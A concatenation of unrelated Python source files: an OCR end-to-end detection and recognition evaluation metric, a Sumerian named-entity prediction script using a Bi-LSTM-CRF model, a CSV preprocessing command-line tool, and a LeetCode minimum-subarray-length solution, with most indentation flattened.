from ppocr.utils.e2e_metric.polygon_fast import iod, area_of_intersection, area
def get_socre(gt_dir, img_id, pred_dict):
allInputs = 1
def input_reading_mod(pred_dict):
"""This helper reads input from txt files"""
det = []
n = len(pred_dict)
for i in range(n):
points = pred_dict[i]['points']
text = pred_dict[i]['texts']
point = ",".join(map(str, points.reshape(-1, )))
det.append([point, text])
return det
def gt_reading_mod(gt_dir, gt_id):
gt = io.loadmat('%s/poly_gt_img%s.mat' % (gt_dir, gt_id))
gt = gt['polygt']
return gt
def detection_filtering(detections, groundtruths, threshold=0.5):
for gt_id, gt in enumerate(groundtruths):
if (gt[5] == '#') and (gt[1].shape[1] > 1):
gt_x = list(map(int, np.squeeze(gt[1])))
gt_y = list(map(int, np.squeeze(gt[3])))
for det_id, detection in enumerate(detections):
detection_orig = detection
detection = [float(x) for x in detection[0].split(',')]
detection = list(map(int, detection))
det_x = detection[0::2]
det_y = detection[1::2]
det_gt_iou = iod(det_x, det_y, gt_x, gt_y)
if det_gt_iou > threshold:
detections[det_id] = []
detections[:] = [item for item in detections if item != []]
return detections
def sigma_calculation(det_x, det_y, gt_x, gt_y):
"""
sigma = inter_area / gt_area
"""
return np.round((area_of_intersection(det_x, det_y, gt_x, gt_y) /
area(gt_x, gt_y)), 2)
def tau_calculation(det_x, det_y, gt_x, gt_y):
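        """
        tau = inter_area / det_area
        """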
if area(det_x, det_y) == 0.0:
return 0
return np.round((area_of_intersection(det_x, det_y, gt_x, gt_y) /
area(det_x, det_y)), 2)
##############################Initialization###################################
# global_sigma = []
# global_tau = []
# global_pred_str = []
# global_gt_str = []
###############################################################################
for input_id in range(allInputs):
if (input_id != '.DS_Store') and (input_id != 'Pascal_result.txt') and (
input_id != 'Pascal_result_curved.txt') and (input_id != 'Pascal_result_non_curved.txt') and (
input_id != 'Deteval_result.txt') and (input_id != 'Deteval_result_curved.txt') \
and (input_id != 'Deteval_result_non_curved.txt'):
detections = input_reading_mod(pred_dict)
groundtruths = gt_reading_mod(gt_dir, img_id).tolist()
detections = detection_filtering(
detections,
groundtruths) # filters detections overlapping with DC area
dc_id = []
for i in range(len(groundtruths)):
if groundtruths[i][5] == '#':
dc_id.append(i)
cnt = 0
for a in dc_id:
num = a - cnt
del groundtruths[num]
cnt += 1
local_sigma_table = np.zeros((len(groundtruths), len(detections)))
local_tau_table = np.zeros((len(groundtruths), len(detections)))
local_pred_str = {}
local_gt_str = {}
for gt_id, gt in enumerate(groundtruths):
if len(detections) > 0:
for det_id, detection in enumerate(detections):
detection_orig = detection
detection = [float(x) for x in detection[0].split(',')]
detection = list(map(int, detection))
pred_seq_str = detection_orig[1].strip()
det_x = detection[0::2]
det_y = detection[1::2]
gt_x = list(map(int, np.squeeze(gt[1])))
gt_y = list(map(int, np.squeeze(gt[3])))
gt_seq_str = str(gt[4].tolist()[0])
local_sigma_table[gt_id, det_id] = sigma_calculation(
det_x, det_y, gt_x, gt_y)
local_tau_table[gt_id, det_id] = tau_calculation(
det_x, det_y, gt_x, gt_y)
local_pred_str[det_id] = pred_seq_str
local_gt_str[gt_id] = gt_seq_str
global_sigma = local_sigma_table
global_tau = local_tau_table
global_pred_str = local_pred_str
global_gt_str = local_gt_str
single_data = {}
single_data['sigma'] = global_sigma
single_data['global_tau'] = global_tau
single_data['global_pred_str'] = global_pred_str
single_data['global_gt_str'] = global_gt_str
return single_data
def combine_results(all_data):
tr = 0.7
tp = 0.6
fsc_k = 0.8
k = 2
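    # tr / tp are the DetEval recall (sigma) and precision (tau) thresholds;
    # k is the minimum group size for split/merge matches, fsc_k their penalty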
global_sigma = []
global_tau = []
global_pred_str = []
global_gt_str = []
for data in all_data:
global_sigma.append(data['sigma'])
global_tau.append(data['global_tau'])
global_pred_str.append(data['global_pred_str'])
global_gt_str.append(data['global_gt_str'])
global_accumulative_recall = 0
global_accumulative_precision = 0
total_num_gt = 0
total_num_det = 0
hit_str_count = 0
hit_count = 0
def one_to_one(local_sigma_table, local_tau_table,
local_accumulative_recall, local_accumulative_precision,
global_accumulative_recall, global_accumulative_precision,
gt_flag, det_flag, idy):
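        # one-to-one match: a gt/det pair where each is the other's only
        # candidate with sigma > tr (coverage) and tau > tp (precision)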
hit_str_num = 0
for gt_id in range(num_gt):
gt_matching_qualified_sigma_candidates = np.where(
local_sigma_table[gt_id, :] > tr)
gt_matching_num_qualified_sigma_candidates = gt_matching_qualified_sigma_candidates[
0].shape[0]
gt_matching_qualified_tau_candidates = np.where(
local_tau_table[gt_id, :] > tp)
gt_matching_num_qualified_tau_candidates = gt_matching_qualified_tau_candidates[
0].shape[0]
det_matching_qualified_sigma_candidates = np.where(
local_sigma_table[:, gt_matching_qualified_sigma_candidates[0]]
> tr)
det_matching_num_qualified_sigma_candidates = det_matching_qualified_sigma_candidates[
0].shape[0]
det_matching_qualified_tau_candidates = np.where(
local_tau_table[:, gt_matching_qualified_tau_candidates[0]] >
tp)
det_matching_num_qualified_tau_candidates = det_matching_qualified_tau_candidates[
0].shape[0]
if (gt_matching_num_qualified_sigma_candidates == 1) and (gt_matching_num_qualified_tau_candidates == 1) and \
(det_matching_num_qualified_sigma_candidates == 1) and (
det_matching_num_qualified_tau_candidates == 1):
global_accumulative_recall = global_accumulative_recall + 1.0
global_accumulative_precision = global_accumulative_precision + 1.0
local_accumulative_recall = local_accumulative_recall + 1.0
local_accumulative_precision = local_accumulative_precision + 1.0
gt_flag[0, gt_id] = 1
matched_det_id = np.where(local_sigma_table[gt_id, :] > tr)
# recg start
gt_str_cur = global_gt_str[idy][gt_id]
pred_str_cur = global_pred_str[idy][matched_det_id[0].tolist()[
0]]
if pred_str_cur == gt_str_cur:
hit_str_num += 1
else:
if pred_str_cur.lower() == gt_str_cur.lower():
hit_str_num += 1
# recg end
det_flag[0, matched_det_id] = 1
return local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, gt_flag, det_flag, hit_str_num
def one_to_many(local_sigma_table, local_tau_table,
local_accumulative_recall, local_accumulative_precision,
global_accumulative_recall, global_accumulative_precision,
gt_flag, det_flag, idy):
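        # one-to-many (split) case: one gt is covered by >= k detections;
        # accepted matches are scored with the fsc_k penalty instead of 1.0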
hit_str_num = 0
for gt_id in range(num_gt):
# skip the following if the groundtruth was matched
if gt_flag[0, gt_id] > 0:
continue
non_zero_in_sigma = np.where(local_sigma_table[gt_id, :] > 0)
num_non_zero_in_sigma = non_zero_in_sigma[0].shape[0]
if num_non_zero_in_sigma >= k:
####search for all detections that overlaps with this groundtruth
qualified_tau_candidates = np.where((local_tau_table[
gt_id, :] >= tp) & (det_flag[0, :] == 0))
num_qualified_tau_candidates = qualified_tau_candidates[
0].shape[0]
if num_qualified_tau_candidates == 1:
if ((local_tau_table[gt_id, qualified_tau_candidates] >= tp)
and
(local_sigma_table[gt_id, qualified_tau_candidates] >=
tr)):
# became an one-to-one case
global_accumulative_recall = global_accumulative_recall + 1.0
global_accumulative_precision = global_accumulative_precision + 1.0
local_accumulative_recall = local_accumulative_recall + 1.0
local_accumulative_precision = local_accumulative_precision + 1.0
gt_flag[0, gt_id] = 1
det_flag[0, qualified_tau_candidates] = 1
# recg start
gt_str_cur = global_gt_str[idy][gt_id]
pred_str_cur = global_pred_str[idy][
qualified_tau_candidates[0].tolist()[0]]
if pred_str_cur == gt_str_cur:
hit_str_num += 1
else:
if pred_str_cur.lower() == gt_str_cur.lower():
hit_str_num += 1
# recg end
elif (np.sum(local_sigma_table[gt_id, qualified_tau_candidates])
>= tr):
gt_flag[0, gt_id] = 1
det_flag[0, qualified_tau_candidates] = 1
# recg start
gt_str_cur = global_gt_str[idy][gt_id]
pred_str_cur = global_pred_str[idy][
qualified_tau_candidates[0].tolist()[0]]
if pred_str_cur == gt_str_cur:
hit_str_num += 1
else:
if pred_str_cur.lower() == gt_str_cur.lower():
hit_str_num += 1
# recg end
global_accumulative_recall = global_accumulative_recall + fsc_k
global_accumulative_precision = global_accumulative_precision + num_qualified_tau_candidates * fsc_k
local_accumulative_recall = local_accumulative_recall + fsc_k
local_accumulative_precision = local_accumulative_precision + num_qualified_tau_candidates * fsc_k
return local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, gt_flag, det_flag, hit_str_num
def many_to_one(local_sigma_table, local_tau_table,
local_accumulative_recall, local_accumulative_precision,
global_accumulative_recall, global_accumulative_precision,
gt_flag, det_flag, idy):
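        # many-to-one (merge) case: one detection covers >= k gts, again
        # scored with the fsc_k penalty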
hit_str_num = 0
for det_id in range(num_det):
# skip the following if the detection was matched
if det_flag[0, det_id] > 0:
continue
non_zero_in_tau = np.where(local_tau_table[:, det_id] > 0)
num_non_zero_in_tau = non_zero_in_tau[0].shape[0]
if num_non_zero_in_tau >= k:
####search for all detections that overlaps with this groundtruth
qualified_sigma_candidates = np.where((
local_sigma_table[:, det_id] >= tp) & (gt_flag[0, :] == 0))
num_qualified_sigma_candidates = qualified_sigma_candidates[
0].shape[0]
if num_qualified_sigma_candidates == 1:
if ((local_tau_table[qualified_sigma_candidates, det_id] >=
tp) and
(local_sigma_table[qualified_sigma_candidates, det_id]
>= tr)):
# became an one-to-one case
global_accumulative_recall = global_accumulative_recall + 1.0
global_accumulative_precision = global_accumulative_precision + 1.0
local_accumulative_recall = local_accumulative_recall + 1.0
local_accumulative_precision = local_accumulative_precision + 1.0
gt_flag[0, qualified_sigma_candidates] = 1
det_flag[0, det_id] = 1
# recg start
pred_str_cur = global_pred_str[idy][det_id]
gt_len = len(qualified_sigma_candidates[0])
for idx in range(gt_len):
ele_gt_id = qualified_sigma_candidates[0].tolist()[
idx]
if ele_gt_id not in global_gt_str[idy]:
continue
gt_str_cur = global_gt_str[idy][ele_gt_id]
if pred_str_cur == gt_str_cur:
hit_str_num += 1
break
else:
if pred_str_cur.lower() == gt_str_cur.lower():
hit_str_num += 1
break
# recg end
elif (np.sum(local_tau_table[qualified_sigma_candidates,
det_id]) >= tp):
det_flag[0, det_id] = 1
gt_flag[0, qualified_sigma_candidates] = 1
# recg start
pred_str_cur = global_pred_str[idy][det_id]
gt_len = len(qualified_sigma_candidates[0])
for idx in range(gt_len):
ele_gt_id = qualified_sigma_candidates[0].tolist()[idx]
if ele_gt_id not in global_gt_str[idy]:
continue
gt_str_cur = global_gt_str[idy][ele_gt_id]
if pred_str_cur == gt_str_cur:
hit_str_num += 1
break
else:
if pred_str_cur.lower() == gt_str_cur.lower():
hit_str_num += 1
break
# recg end
global_accumulative_recall = global_accumulative_recall + num_qualified_sigma_candidates * fsc_k
global_accumulative_precision = global_accumulative_precision + fsc_k
local_accumulative_recall = local_accumulative_recall + num_qualified_sigma_candidates * fsc_k
local_accumulative_precision = local_accumulative_precision + fsc_k
return local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, gt_flag, det_flag, hit_str_num
for idx in range(len(global_sigma)):
local_sigma_table = np.array(global_sigma[idx])
local_tau_table = global_tau[idx]
num_gt = local_sigma_table.shape[0]
num_det = local_sigma_table.shape[1]
total_num_gt = total_num_gt + num_gt
total_num_det = total_num_det + num_det
local_accumulative_recall = 0
local_accumulative_precision = 0
gt_flag = np.zeros((1, num_gt))
det_flag = np.zeros((1, num_det))
#######first check for one-to-one case##########
local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, \
gt_flag, det_flag, hit_str_num = one_to_one(local_sigma_table, local_tau_table,
local_accumulative_recall, local_accumulative_precision,
global_accumulative_recall, global_accumulative_precision,
gt_flag, det_flag, idx)
hit_str_count += hit_str_num
#######then check for one-to-many case##########
local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, \
gt_flag, det_flag, hit_str_num = one_to_many(local_sigma_table, local_tau_table,
local_accumulative_recall, local_accumulative_precision,
global_accumulative_recall, global_accumulative_precision,
gt_flag, det_flag, idx)
hit_str_count += hit_str_num
#######then check for many-to-one case##########
local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, \
gt_flag, det_flag, hit_str_num = many_to_one(local_sigma_table, local_tau_table,
local_accumulative_recall, local_accumulative_precision,
global_accumulative_recall, global_accumulative_precision,
gt_flag, det_flag, idx)
hit_str_count += hit_str_num
try:
recall = global_accumulative_recall / total_num_gt
except ZeroDivisionError:
recall = 0
try:
precision = global_accumulative_precision / total_num_det
except ZeroDivisionError:
precision = 0
try:
f_score = 2 * precision * recall / (precision + recall)
except ZeroDivisionError:
f_score = 0
try:
seqerr = 1 - float(hit_str_count) / global_accumulative_recall
except ZeroDivisionError:
seqerr = 1
try:
recall_e2e = float(hit_str_count) / total_num_gt
except ZeroDivisionError:
recall_e2e = 0
try:
precision_e2e = float(hit_str_count) / total_num_det
except ZeroDivisionError:
precision_e2e = 0
try:
f_score_e2e = 2 * precision_e2e * recall_e2e / (
precision_e2e + recall_e2e)
except ZeroDivisionError:
f_score_e2e = 0
final = {
'total_num_gt': total_num_gt,
'total_num_det': total_num_det,
'global_accumulative_recall': global_accumulative_recall,
'hit_str_count': hit_str_count,
'recall': recall,
'precision': precision,
'f_score': f_score,
'seqerr': seqerr,
'recall_e2e': recall_e2e,
'precision_e2e': precision_e2e,
'f_score_e2e': f_score_e2e
}
return final
# File: /NER_Models/NER_Bi_LSTM_CRF/prediction.py (repo: byronblaze-ml/Sumerian-Translation-Pipeline, MIT)
import numpy as np
import pandas as pd
import argparse
import pickle
from collections import OrderedDict
from keras.models import load_model
from keras.preprocessing.sequence import pad_sequences
from keras_contrib.layers import CRF
from keras_contrib.losses import crf_loss
from keras_contrib.metrics import crf_viterbi_accuracy
def Openfile(filename):
Monolingual_sumerian=[]
with open(filename) as f:
for line in f:
line=line.strip()
Monolingual_sumerian.append(line)
return Monolingual_sumerian
def Savefile(Monolingual_sumerian,POS_list):
with open(args.output, 'w') as f:
for i in range(len(POS_list)):
f.write("%s\n" %str(i+1))
f.write("sentence: %s\n" %Monolingual_sumerian[i])
f.write("NER:%s\n" % POS_list[i])
print()
def preparedicts():
with open("NER_Models/NER_Bi_LSTM_CRF/Sumerian_Vocab.pkl",'rb') as f:
vocabulary=pickle.load(f)
word2idx,idx2word,tag2idx,idx2tag=vocabulary
return word2idx,idx2word,tag2idx,idx2tag
def preparetestData(sentences,word2idx):
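    # map each token to its vocabulary index, falling back to the UNK id for
    # out-of-vocabulary words, then pad every sentence to MAX with <end>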
X=[]
for s in sentences:
l=[]
s=s.split()
for w in s:
try:
l.append(word2idx[w])
except KeyError:
l.append(word2idx["UNK"])
X.append(l)
X = pad_sequences(maxlen=MAX, sequences=X, padding="post", value=word2idx["<end>"])
return X
def pred2label(pred,idx2tag):
out = []
for pred_i in pred:
out_i = []
for p in pred_i:
p_i = np.argmax(p)
tag=idx2tag[p_i]
out_i.append(tag)
out.append(out_i)
return out
def Predict_Testtag(loaded_model,X,Monolingual_sumerian,idx2tag):
test_pred = loaded_model.predict(X, verbose=1)
y_pred = pred2label(test_pred,idx2tag)
for i in range(len(Monolingual_sumerian)):
s=Monolingual_sumerian[i].split()
y_pred[i]=y_pred[i][:len(s)]
return y_pred
def POSLIST(Monolingual_sumerian,Prediction):
my_list=[]
for i in range(len(Monolingual_sumerian)):
print(i+1)
print("sentence: "+Monolingual_sumerian[i])
l=Monolingual_sumerian[i].split()
POS=""
for j in range(len(l)):
POS=POS+"("+l[j]+","+Prediction[i][j]+")"+" "
print('NER:'+POS)
my_list.append(POS)
print()
return my_list
def main():
Monolingual_sumerian=Openfile(args.input)
loaded_model = load_model(args.saved,custom_objects={'CRF':CRF,
'crf_loss':crf_loss,
'crf_viterbi_accuracy':crf_viterbi_accuracy})
word2idx,idx2word,tag2idx,idx2tag= preparedicts()
X=preparetestData(Monolingual_sumerian,word2idx)
Prediction=Predict_Testtag(loaded_model,X,Monolingual_sumerian,idx2tag)
POS_list=POSLIST(Monolingual_sumerian,Prediction)
print("Saving_file "+args.output)
Savefile(Monolingual_sumerian,POS_list)
if __name__=='__main__':
# max sentence length is set to 50
MAX=50
#Input_path='Dataset/Augmented_NER_training_ml.csv'
#Embedding_path='Word_Embeddings/sumerian_word2vec_50.txt'
parser = argparse.ArgumentParser()
parser.add_argument("-i","--input",help="Location of the Input text file to be predicted", default="Dataset/sumerian_demo.txt")
parser.add_argument("-s","--saved",help="Location of saved CRF weights in .h5 format", default="Saved_Models/NER/NER_Bi_LSTM_CRF.h5" )
parser.add_argument("-o","--output",help="Location of output text file(Result)", default='Output/NER_Bi_LSTM_CRF.txt')
args=parser.parse_args()
print("\n")
print("Input file is ", args.input)
print("Saved model is ", args.saved)
print("Output file will be ", args.output)
print("\n")
main()
# File: /main.py (repo: tungrg/KTDL-1, no license)
import sys
import csv
import Cau01
import Cau02
import Cau03
import Cau04
import Cau05
import Cau06
import Cau07
import Cau08
# read a csv file
def readFile(inputFile):
    # variable to hold the rows read from the file
listRow = []
with open(inputFile) as csvfile:
        # csv.DictReader reads the csv file into a variable of dictionary type
reader = csv.DictReader(csvfile)
for row in reader:
            # store it as a list instead
listRow.append(row)
return listRow
def writeFile(outputFile,listRow):
with open(outputFile, 'w', newline='') as csvfile:
        # write the csv file from the dictionary-typed rows
writer = csv.DictWriter(csvfile, fieldnames = listRow[0].keys())
        # write the column names first
writer.writeheader()
for row in listRow:
writer.writerow(row)
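# Usage (inferred from the argv handling below), e.g.:
#   python main.py input.csv cau01
#   python main.py input.csv cau03 mean output.csv
#   python main.py input.csv cau07 Min-Max <column> output.csv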
if __name__ == '__main__':
input_file_name = str(sys.argv[1])
listRow = readFile(input_file_name)
if str(sys.argv[2]) == "cau01":
res = Cau01.cau01(listRow)
for x, y in res.items():
print(x, '-', y)
elif str(sys.argv[2]) == "cau02":
Cau02.cau02(listRow)
elif str(sys.argv[2]) == "cau03":
if str(sys.argv[3]) == "mean":
temp = Cau03.calculateMean(listRow)
writeFile(str(sys.argv[4]), temp)
elif str(sys.argv[3]) == "median":
temp = Cau03.calculateMedian(listRow)
writeFile(str(sys.argv[4]), temp)
elif str(sys.argv[2]) == "cau04":
temp = Cau04.deleteRow(listRow, str(sys.argv[3]))
writeFile(str(sys.argv[4]), temp)
elif str(sys.argv[2]) == "cau05":
temp = Cau05.deleteColumn(listRow, str(sys.argv[3]))
writeFile(str(sys.argv[4]), temp)
elif str(sys.argv[2]) == "cau06":
temp = Cau06.DeleteDuplicateRows(listRow)
writeFile(str(sys.argv[3]), temp)
elif str(sys.argv[2]) == "cau07":
if str(sys.argv[3]) == "Min-Max":
temp = Cau07.setAttributeByMin_MaxMethod(listRow, sys.argv[4])
if temp == 0:
print("This row cann't standardize!.")
else:
writeFile(str(sys.argv[5]), temp)
elif str(sys.argv[3]) == "Z-Score":
temp = Cau07.setAttributeByZ_ScoreMethod(listRow, sys.argv[4])
if temp == 0:
print("This row cann't standardize!.")
else:
writeFile(str(sys.argv[5]), temp)
elif str(sys.argv[2]) == "cau08":
temp = Cau08.addColumn(listRow, sys.argv[3])
if temp == 0:
print("Wrong input expression.")
else:
            writeFile(str(sys.argv[4]), temp)
# File: /209_1.py (repo: saleed/LeetCode, no license)
class Solution(object):
def minSubArrayLen(self, target, nums):
"""
:type target: int
:type nums: List[int]
:rtype: int
"""
if len(nums)==0:
return 0
i=0
j=0
max_seq=float("inf")
tmpsum=0
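        # two-pointer sliding window: extend j while the sum is short of
        # target, shrink i while it meets target, tracking the best length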
while True:
if tmpsum>=target:
max_seq=min(j-i,max_seq)
if i<len(nums):
tmpsum-=nums[i]
i+=1
else:
break
else:
if j<len(nums):
tmpsum+=nums[j]
j+=1
else:
break
if max_seq==float("inf"):
return 0
        return max_seq